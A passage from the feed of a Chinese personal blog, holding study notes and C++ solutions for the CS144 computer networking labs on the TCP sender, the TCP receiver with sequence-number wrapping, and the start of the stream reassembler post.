class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">uint64_t</span> <span class="title">TCPSender::bytes_in_flight</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _outgoing_bytes; &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">TCPSender::fill_window</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 如果远程窗口大小为 0, 则把其视为 1 进行操作</span></span><br><span class="line">    <span class="type">size_t</span> curr_window_size = _last_window_size ? _last_window_size : <span class="number">1</span>;</span><br><span class="line">    <span class="comment">// 循环填充窗口</span></span><br><span class="line">    <span class="keyword">while</span> (curr_window_size &gt; _outgoing_bytes) &#123;</span><br><span class="line">        <span class="comment">// 尝试构造单个数据包</span></span><br><span class="line">        <span class="comment">// 如果此时尚未发送 SYN 数据包，则立即发送</span></span><br><span class="line">        TCPSegment segment;</span><br><span class="line">        <span class="keyword">if</span> (!_set_syn_flag) &#123;</span><br><span class="line">            segment.<span class="built_in">header</span>().syn = <span class="literal">true</span>;</span><br><span class="line">            _set_syn_flag = <span class="literal">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 设置 seqno</span></span><br><span class="line">        segment.<span class="built_in">header</span>().seqno = <span class="built_in">next_seqno</span>();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 装入 payload.</span></span><br><span class="line">        <span class="type">const</span> <span class="type">size_t</span> payload_size =</span><br><span class="line">            <span class="built_in">min</span>(TCPConfig::MAX_PAYLOAD_SIZE, curr_window_size - _outgoing_bytes - segment.<span class="built_in">header</span>().syn);</span><br><span class="line">        string payload = _stream.<span class="built_in">read</span>(payload_size);</span><br><span class="line"></span><br><span class="line">        <span class="comment">/**</span></span><br><span class="line"><span class="comment">         * 读取好后，如果满足以下条件，则增加 FIN</span></span><br><span class="line"><span class="comment">         *  1. 从来没发送过 FIN</span></span><br><span class="line"><span class="comment">         *  2. 输入字节流处于 EOF</span></span><br><span class="line"><span class="comment">         *  3. window 减去 payload 大小后，仍然可以存放下 FIN</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="keyword">if</span> (!_set_fin_flag &amp;&amp; _stream.<span class="built_in">eof</span>() &amp;&amp; payload.<span class="built_in">size</span>() + _outgoing_bytes &lt; curr_window_size)</span><br><span class="line">            _set_fin_flag = segment.<span class="built_in">header</span>().fin = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line">        segment.<span class="built_in">payload</span>() = <span class="built_in">Buffer</span>(<span class="built_in">move</span>(payload));</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 如果没有任何数据，则停止数据包的发送</span></span><br><span class="line">        <span class="keyword">if</span> (segment.<span class="built_in">length_in_sequence_space</span>() == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 如果没有正在等待的数据包，则重设更新时间</span></span><br><span class="line">        <span class="keyword">if</span> (_outgoing_map.<span class="built_in">empty</span>()) &#123;</span><br><span class="line">            _timeout = _initial_retransmission_timeout;</span><br><span class="line">            _timecount = <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 发送</span></span><br><span class="line">        _segments_out.<span class="built_in">push</span>(segment);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 追踪这些数据包</span></span><br><span class="line">        _outgoing_bytes += segment.<span class="built_in">length_in_sequence_space</span>();</span><br><span class="line">        _outgoing_map.<span class="built_in">insert</span>(<span class="built_in">make_pair</span>(_next_seqno, segment));</span><br><span class="line">        <span class="comment">// 更新待发送 abs seqno</span></span><br><span class="line">        _next_seqno += segment.<span class="built_in">length_in_sequence_space</span>();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 如果设置了 fin，则直接退出填充 window 的操作</span></span><br><span class="line">        <span class="keyword">if</span> (segment.<span class="built_in">header</span>().fin)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! \param ackno The remote receiver&#x27;s ackno (acknowledgment number)</span></span><br><span class="line"><span class="comment">//! \param window_size The remote receiver&#x27;s advertised window size</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">TCPSender::ack_received</span><span class="params">(<span class="type">const</span> WrappingInt32 ackno, <span class="type">const</span> <span class="type">uint16_t</span> window_size)</span> </span>&#123;</span><br><span class="line">    <span class="type">size_t</span> abs_seqno = <span class="built_in">unwrap</span>(ackno, _isn, _next_seqno);</span><br><span class="line">    <span class="comment">// 如果传入的 ack 是不可靠的，则直接丢弃</span></span><br><span class="line">    <span class="keyword">if</span> (abs_seqno &gt; _next_seqno)</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    <span class="comment">// 遍历数据结构，将已经接收到的数据包丢弃</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> iter = _outgoing_map.<span class="built_in">begin</span>(); iter != _outgoing_map.<span class="built_in">end</span>();) &#123;</span><br><span class="line">        <span class="comment">// 如果一个发送的数据包已经被成功接收</span></span><br><span class="line">        <span class="type">const</span> TCPSegment &amp;seg = iter-&gt;second;</span><br><span class="line">        <span class="keyword">if</span> (iter-&gt;first + seg.<span class="built_in">length_in_sequence_space</span>() &lt;= abs_seqno) &#123;</span><br><span class="line">            _outgoing_bytes -= seg.<span class="built_in">length_in_sequence_space</span>();</span><br><span class="line">            iter = _outgoing_map.<span class="built_in">erase</span>(iter);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 如果有新的数据包被成功接收，则清空超时时间</span></span><br><span class="line">            _timeout = _initial_retransmission_timeout;</span><br><span class="line">            _timecount = <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 如果当前遍历到的数据包还没被接收，则说明后面的数据包均未被接收，因此直接返回</span></span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    _consecutive_retransmissions_count = <span class="number">0</span>;</span><br><span class="line">    <span class="comment">// 填充后面的数据</span></span><br><span class="line">    _last_window_size = window_size;</span><br><span class="line">    <span class="built_in">fill_window</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! \param[in] ms_since_last_tick the number of milliseconds since the last call to this method</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">TCPSender::tick</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> ms_since_last_tick)</span> </span>&#123;</span><br><span class="line">    _timecount += ms_since_last_tick;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">auto</span> iter = _outgoing_map.<span class="built_in">begin</span>();</span><br><span class="line">    <span class="comment">// 如果存在发送中的数据包，并且定时器超时</span></span><br><span class="line">    <span class="keyword">if</span> (iter != _outgoing_map.<span class="built_in">end</span>() &amp;&amp; _timecount &gt;= _timeout) &#123;</span><br><span class="line">        <span class="comment">// 如果窗口大小不为0还超时，则说明网络拥堵</span></span><br><span class="line">        <span class="keyword">if</span> (_last_window_size &gt; <span class="number">0</span>)</span><br><span class="line">            _timeout *= <span class="number">2</span>;</span><br><span class="line">        _timecount = <span class="number">0</span>;</span><br><span class="line">        _segments_out.<span class="built_in">push</span>(iter-&gt;second);</span><br><span class="line">        <span class="comment">// 连续重传计时器增加</span></span><br><span class="line">        ++_consecutive_retransmissions_count;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">unsigned</span> <span class="type">int</span> <span class="title">TCPSender::consecutive_retransmissions</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _consecutive_retransmissions_count; &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">TCPSender::send_empty_segment</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    TCPSegment segment;</span><br><span class="line">    segment.<span class="built_in">header</span>().seqno = <span class="built_in">next_seqno</span>();</span><br><span class="line">    _segments_out.<span class="built_in">push</span>(segment);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里记录了笔者学习 CS144 计算机网络 Lab3 的一些笔记 - TCP 发送方实现 TCPSender&lt;/p&gt;
&lt;p&gt;CS144 Lab3 实验指导书 - &lt;a href=&quot;https://cs144.github.io/assignments/lab3.pdf&quot;&gt;Lab Checkpoint 3: the TCP sender&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;个人 CS144 实验项目地址 - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144计算机网络 Lab2</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab2/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab2/</id>
    <published>2021-11-06T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.910Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里记录了笔者学习 CS144 计算机网络 Lab2 的一些笔记 - TCP接收方实现 TCPReceiver</p><p>CS144 Lab2 实验指导书 - <a href="https://cs144.github.io/assignments/lab2.pdf">Lab Checkpoint 2: the TCP receiver</a></p><p>个人 CS144 实验项目地址 - <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><h2 id="二、环境配置">二、环境配置</h2><p>当前我们的实验代码位于 <code>master</code> 分支，而在完成 Lab 之前需要合并一些依赖代码，因此执行以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab2-startercode</span><br></pre></td></tr></table></figure><p>之后重新 make 编译即可。</p><h2 id="三、TCPReceiver-简述">三、TCPReceiver 简述</h2><p>在 Lab2，我们将实现一个 TCPReceiver，用以接收传入的 TCP segment 并将其转换成用户可读的数据流。</p><p>TCPReceiver 除了将读入的数据写入至 ByteStream 中以外，它还需要<strong>告诉发送者两个属性</strong>：</p><ul><li>第一个未组装的字节索引，称为<strong>确认号ackno</strong>，它是接收者需要的第一个字节的索引。</li><li><strong>第一个未组装的字节索引</strong>和<strong>第一个不可接受的字节索引</strong>之间的距离，称为 <strong>窗口长度window size</strong>。</li></ul><p>ackno 和 window size 共同描述了接收者当前的<strong>接收窗口</strong>。接收窗口是 发送者允许发送数据的一个范围，通常 TCP 接收方使用接收窗口来进行<strong>流量控制</strong>，限制发送方发送数据。</p><p>总的来说，我们将要实现的 TCPReceiver 需要做以下几件事情：</p><ul><li>接收TCP segment</li><li>重新组装字节流（包括EOF）</li><li>确定应该发回给发送者的信号，以进行数据确认和流量控制</li></ul><h2 id="四、索引转换">四、索引转换</h2><p>TCP 报文中用来描述**当前数据首字节的索引（序列号 seqno）**是32位类型的，这意味着在处理上增加了一些需要考虑的东西：</p><ul><li><p>由于 32位类型最大能表达的值是 4GB，存在上溢的可能。因此当 32位的 seqno 上溢后，下一个字节的 seqno 就重新从 0 开始。</p></li><li><p>处于安全性考虑，以及避免与之前的 TCP 报文混淆，TCP 需要让每个 seqno 都不可被猜测到，并且降低重复的可能性。因此 TCP seqno 不会从 0 开始，而是从一个 32 位随机数起步（称为<strong>初始序列号 ISN</strong>）。</p><p>而 ISN 是表示 SYN 包（用以表示TCP 流的开始）的序列号。</p></li><li><p>TCP 流的<strong>逻辑开始数据包</strong>和<strong>逻辑结束数据包</strong>各占用一个 seqno。除了确保<strong>接收到所有字节的数据</strong>以外，TCP 还需要确保接收到<strong>流的开头和结尾</strong>。 因此，在 TCP 中，SYN（流开始）和 FIN（流结束）控制标志将会被分别分配一个序列号（SYN标志占用的序列号就是ISN）。</p><p>流中的每个数据字节也占用一个序列号。</p><p>但需要注意的是，SYN 和 FIN 不是流本身的一部分，也不是传输的字节数据。它们只是代表字节流本身的开始和结束。</p></li></ul><p>字节索引类型一多就容易乱。当前总共有三种索引：</p><ul><li>序列号 seqno。<strong>从 ISN 起步</strong>，包含 SYN 和 FIN，<strong>32 位循环</strong>计数</li><li>绝对序列号 absolute seqno。<strong>从 0 起步</strong>，包含 SYN 和 FIN，<strong>64 位非循环</strong>计数</li><li>流索引 stream index。<strong>从 0 起步</strong>，<strong>排除 SYN 和 FIN</strong>，<strong>64 位非循环</strong>计数。</li></ul><p>这是一个简单浅显的例子，用于区分开三种索引的区别：</p><p><img src="/2021/11/cs144-lab2/image-20211107105751818.png" alt="image-20211107105751818"></p><p>序列号和<strong>绝对</strong>序列号之间相互转换稍微有点麻烦，因为序列号是<strong>循环计数</strong>的。在该实验中，CS144 使用自定义类型 WrappingInt32 表示序列号，并编写了它与绝对序列号之间的转换。</p><blockquote><p>但这个需要我们自己实现，天下没有免费的午餐（笑）</p></blockquote><p>这个实现稍微有点麻烦，而且实现的时候也最好避免各类循环，减少使用条件判断的次数，以提高执行效率。</p><p>我的实现如下所示，相关细节以注释形式写入至代码中：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//! Transform an &quot;absolute&quot; 64-bit sequence number (zero-indexed) into a WrappingInt32</span></span><br><span class="line"><span class="comment">//! \param n The input absolute 64-bit sequence number</span></span><br><span class="line"><span class="comment">//! \param isn The initial sequence number</span></span><br><span class="line"><span class="function">WrappingInt32 <span class="title">wrap</span><span class="params">(<span class="type">uint64_t</span> n, WrappingInt32 isn)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> WrappingInt32&#123;isn + <span class="built_in">static_cast</span>&lt;<span class="type">uint32_t</span>&gt;(n)&#125;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! Transform a WrappingInt32 into an &quot;absolute&quot; 64-bit sequence number (zero-indexed)</span></span><br><span class="line"><span class="comment">//! \param n The relative sequence number</span></span><br><span class="line"><span class="comment">//! \param isn The initial sequence number</span></span><br><span class="line"><span class="comment">//! \param checkpoint A recent absolute 64-bit sequence number</span></span><br><span class="line"><span class="comment">//! \returns the 64-bit sequence number that wraps to `n` and is closest to `checkpoint`</span></span><br><span class="line"><span class="comment">//!</span></span><br><span class="line"><span class="comment">//! \note Each of the two streams of the TCP connection has its own ISN. One stream</span></span><br><span class="line"><span class="comment">//! runs from the local TCPSender to the remote TCPReceiver and has one ISN,</span></span><br><span class="line"><span class="comment">//! and the other stream runs from the remote TCPSender to the local TCPReceiver and</span></span><br><span class="line"><span class="comment">//! has a different ISN.</span></span><br><span class="line"><span class="function"><span class="type">uint64_t</span> <span class="title">unwrap</span><span class="params">(WrappingInt32 n, WrappingInt32 isn, <span class="type">uint64_t</span> checkpoint)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 32位的范围</span></span><br><span class="line">    <span class="type">const</span> <span class="keyword">constexpr</span> <span class="type">uint64_t</span> INT32_RANGE = <span class="number">1l</span> &lt;&lt; <span class="number">32</span>;</span><br><span class="line">    <span class="comment">// 获取 n 与 isn 之间的偏移量（mod）</span></span><br><span class="line">    <span class="comment">// 实际的 absolute seqno % INT32_RANGE == offset</span></span><br><span class="line">    <span class="type">uint32_t</span> offset = n - isn;</span><br><span class="line">    <span class="comment">/// <span class="doctag">NOTE:</span> 最大的坑点！如果 checkpoint 比 offset 大，那么就需要进行四舍五入</span></span><br><span class="line">    <span class="comment">/// <span class="doctag">NOTE:</span> 但是!!! 如果 checkpoint 比 offset 还小，那就只能向上入了，即此时的 offset 就是 abs seqno</span></span><br><span class="line">    <span class="keyword">if</span>(checkpoint &gt; offset) &#123;</span><br><span class="line">        <span class="comment">// 加上半个 INT32_RANGE 是为了四舍五入</span></span><br><span class="line">        <span class="type">uint64_t</span> real_checkpoint = (checkpoint - offset) + (INT32_RANGE &gt;&gt; <span class="number">1</span>);</span><br><span class="line">        <span class="type">uint64_t</span> wrap_num = real_checkpoint / INT32_RANGE;</span><br><span class="line">        <span class="keyword">return</span> wrap_num * INT32_RANGE + offset;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">       <span class="keyword">return</span> offset;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="四、TCPReceiver-实现">四、TCPReceiver 实现</h2><h3 id="1-要求">1. 要求</h3><p>需要实现一些类成员函数</p><ul><li><p><code>segment_received()</code>: 该函数将会在每次获取到 TCP 报文时被调用。该函数需要完成：</p><ul><li><p>如果接收到了 SYN 包，则设置 ISN 编号。</p><p>注意：SYN 和 FIN 包<strong>仍然可以携带用户数据并一同传输</strong>。同时，<strong>同一个数据包下既可以设置 SYN 标志也可以设置 FIN 标志</strong>。</p></li><li><p>将获取到的数据传入流重组器，并在接收到 FIN 包时终止数据传输。</p></li></ul></li><li><p><code>ackno()</code>：返回接收方<strong>尚未获取到的第一个字节的字节索引</strong>。如果 ISN 暂未被设置，则返回空。</p></li><li><p><code>window_size()</code>：返回接收窗口的大小，即<strong>第一个未组装的字节索引</strong>和<strong>第一个不可接受的字节索引</strong>之间的长度。</p></li></ul><p>这是 CS144 对 TCP receiver 的期望执行流程：</p><p><img src="/2021/11/cs144-lab2/image-20211107122822566.png" alt="image-20211107122822566"></p><h3 id="2-具体实现">2. 具体实现</h3><h4 id="思路">思路</h4><p>对于 TCPReceiver 来说，除了错误状态以外，它一共有3种状态，分别是：</p><ul><li>LISTEN：等待 SYN 包的到来。若在 SYN 包到来前就有其他数据到来，则<strong>必须丢弃</strong>。</li><li>SYN_RECV：获取到了 SYN 包，此时可以正常的接收数据包</li><li>FIN_RECV：获取到了 FIN 包，此时务必终止 ByteStream 数据流的输入。</li></ul><p>在每次 TCPReceiver 接收到数据包时，我们该如何知道当前接收者处于什么状态呢？可以通过以下方式快速判断：</p><ul><li>当 isn 还没设置时，肯定是 LISTEN 状态</li><li>当 ByteStream.input_ended()，则肯定是 FIN_RECV 状态</li><li>其他情况下，是 SYN_RECV 状态</li></ul><p>Window Size 是当前的 capacity 减去 ByteStream 中尚未被读取的数据大小，即 reassembler 可以存储的尚未装配的子串索引范围。</p><p>ackno 的计算必须考虑到 SYN 和 FIN 标志，因为这两个标志各占一个 seqno。故在返回 ackno 时，务必判断当前 接收者处于什么状态，然后依据当前状态来判断是否需要对当前的计算结果加1或加2。而这条准则对 push_substring 时同样适用。</p><h4 id="源码实现">源码实现</h4><p>类声明：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">TCPReceiver</span> &#123;</span><br><span class="line">    WrappingInt32 _isn;</span><br><span class="line">    <span class="type">bool</span> _set_syn_flag;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Our data structure for re-assembling bytes.</span></span><br><span class="line">    StreamReassembler _reassembler;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! The maximum number of bytes we&#x27;ll store.</span></span><br><span class="line">    <span class="type">size_t</span> _capacity;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">public</span>:</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>方法实现：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> *  \brief 当前 TCPReceiver 大体上有三种状态， 分别是</span></span><br><span class="line"><span class="comment"> *      1. LISTEN，此时 SYN 包尚未抵达。可以通过 _set_syn_flag 标志位来判断是否在当前状态</span></span><br><span class="line"><span class="comment"> *      2. SYN_RECV, 此时 SYN 抵达。只能判断当前不在 1、3状态时才能确定在当前状态</span></span><br><span class="line"><span class="comment"> *      3. FIN_RECV, 此时 FIN 抵达。可以通过 ByteStream end_input 来判断是否在当前状态</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">TCPReceiver::segment_received</span><span class="params">(<span class="type">const</span> TCPSegment &amp;seg)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 判断是否是 SYN 包</span></span><br><span class="line">    <span class="type">const</span> TCPHeader &amp;header = seg.<span class="built_in">header</span>();</span><br><span class="line">    <span class="keyword">if</span> (!_set_syn_flag) &#123;</span><br><span class="line">        <span class="comment">// 注意 SYN 包之前的数据包必须全部丢弃</span></span><br><span class="line">        <span class="keyword">if</span> (!header.syn)</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        _isn = header.seqno;</span><br><span class="line">        _set_syn_flag = <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">uint64_t</span> abs_ackno = _reassembler.<span class="built_in">stream_out</span>().<span class="built_in">bytes_written</span>() + <span class="number">1</span>;</span><br><span class="line">    <span class="type">uint64_t</span> curr_abs_seqno = <span class="built_in">unwrap</span>(header.seqno, _isn, abs_ackno);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! <span class="doctag">NOTE:</span> SYN 包中的 payload 不能被丢弃</span></span><br><span class="line">    <span class="comment">//! <span class="doctag">NOTE:</span> reassember 足够鲁棒以至于无需进行任何 seqno 过滤操作</span></span><br><span class="line">    <span class="type">uint64_t</span> stream_index = curr_abs_seqno - <span class="number">1</span> + (header.syn);</span><br><span class="line">    _reassembler.<span class="built_in">push_substring</span>(seg.<span class="built_in">payload</span>().<span class="built_in">copy</span>(), stream_index, header.fin);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">optional&lt;WrappingInt32&gt; <span class="title">TCPReceiver::ackno</span><span class="params">()</span> <span class="type">const</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 判断是否是在 LISTEN 状态</span></span><br><span class="line">    <span class="keyword">if</span> (!_set_syn_flag)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nullopt</span>;</span><br><span class="line">    <span class="comment">// 如果不在 LISTEN 状态，则 ackno 还需要加上一个 SYN 标志的长度</span></span><br><span class="line">    <span class="type">uint64_t</span> abs_ack_no = _reassembler.<span class="built_in">stream_out</span>().<span class="built_in">bytes_written</span>() + <span class="number">1</span>;</span><br><span class="line">    <span class="comment">// 如果当前处于 FIN_RECV 状态，则还需要加上 FIN 标志长度</span></span><br><span class="line">    <span class="keyword">if</span> (_reassembler.<span class="built_in">stream_out</span>().<span class="built_in">input_ended</span>())</span><br><span class="line">        ++abs_ack_no;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">WrappingInt32</span>(_isn) + abs_ack_no;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">TCPReceiver::window_size</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _capacity - _reassembler.<span class="built_in">stream_out</span>().<span class="built_in">buffer_size</span>(); &#125;</span><br></pre></td></tr></table></figure><p>测试结果就不贴了，不同的机器上跑所消耗的时间是不一样的，没什么可比性。</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里记录了笔者学习 CS144 计算机网络 Lab2 的一些笔记 - TCP接收方实现 TCPReceiver&lt;/p&gt;
&lt;p&gt;CS144 Lab2 实验指导书 - &lt;a href=&quot;https://cs144.github.io/assignments/lab2.pdf&quot;&gt;Lab Checkpoint 2: the TCP receiver&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;个人 CS144 实验项目地址 - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144计算机网络 Lab1</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab1/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab1/</id>
    <published>2021-11-04T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.908Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里记录了笔者学习 CS144 计算机网络 Lab1 的一些笔记 - 流重组器 StreamReassembler</p><p>CS144 Lab1 实验指导书 - <a href="https://cs144.github.io/assignments/lab1.pdf">Lab Checkpoint 1: stitching substrings into a byte stream</a></p><p>个人 CS144 实验项目地址 - <a href="https://github.com/Kiprey/sponge">github</a></p><p>PS: 在做 CS144 前，最好先学一手计网理论，或者读读我之前写的<a href="https://kiprey.github.io/2021/05/cnatda-1/#4-%E9%9D%A2%E5%90%91%E8%BF%9E%E6%8E%A5%E7%9A%84%E8%BF%90%E8%BE%93%EF%BC%9ATCP">笔记</a></p><span id="more"></span><h2 id="二、实验结构">二、实验结构</h2><p>这幅图完整的说明了CS144 这门实验的结构：</p><p><img src="/2021/11/cs144-lab1/image-20211105142904316.png" alt="image-20211105142904316"></p><p>其中， <code>ByteStream</code> 是我们已经在 Lab0 中实现完成的。</p><p>我们将在接下来的实验中分别实现：</p><ul><li>Lab1 <code>StreamReassembler</code>：实现一个流重组器，一个将字节流的字串或者小段按照正确顺序来拼接回连续字节流的模块</li><li>Lab2 <code>TCPReceiver</code>：实现入站字节流的TCP部分。</li><li>Lab3 <code>TCPSender</code>：实现出站字节流的TCP部分。</li><li>Lab4 <code>TCPConnection</code>:   结合之前的工作来创建一个有效的 TCP 实现。最后我们可以使用这个 TCP 实现来和真实世界的服务器进行通信。</li></ul><blockquote><p>该实验引导我们以模块化的方式构建一个 TCP 实现。</p></blockquote><p>流重组器在 TCP 起到了相当重要的作用。迫于网络环境的限制，TCP 发送者会将数据切割成一个个小段的数据分批发送。但这就可能带来一些新的问题：数据在网络中传输时可能丢失、重排、多次重传等等。而TCP接收者就必须通过流重组器，将接收到的<strong>这些重排重传等等的数据包</strong>重新组装成新的连续字节流。</p><h2 